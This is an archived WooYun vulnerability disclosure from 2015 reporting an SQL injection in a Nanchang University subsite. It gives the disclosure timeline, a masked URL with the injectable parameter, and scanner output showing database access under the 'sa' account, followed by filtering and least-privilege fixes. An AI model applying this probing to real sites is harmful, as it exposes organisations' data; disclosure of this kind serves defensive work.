乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-19: 细节已通知厂商并且等待厂商处理中 2015-08-24: 厂商已经确认,细节仅向厂商公开 2015-09-03: 细节向核心白帽子及相关领域专家公开 2015-09-13: 细节向普通白帽子公开 2015-09-23: 细节向实习白帽子公开 2015-10-08: 细节向公众公开
南昌大学一分站SQL注入漏洞,SA权限
http://**.**.**.**/Users/Main/Search.aspx?campusCategoryId=1
单引号报错扫之
---[15:39:49] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2005[15:39:49] [INFO] fetching current user[15:39:49] [INFO] resumed: sacurrent user: 'sa'
再扫
---[15:40:23] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2005[15:40:23] [INFO] fetching current database[15:40:23] [INFO] resumed: AlumniDBcurrent database: 'AlumniDB'
……………………
1.过滤2.最小权限
危害等级:中
漏洞Rank:6
确认时间:2015-08-24 08:31
通知用户处理中
暂无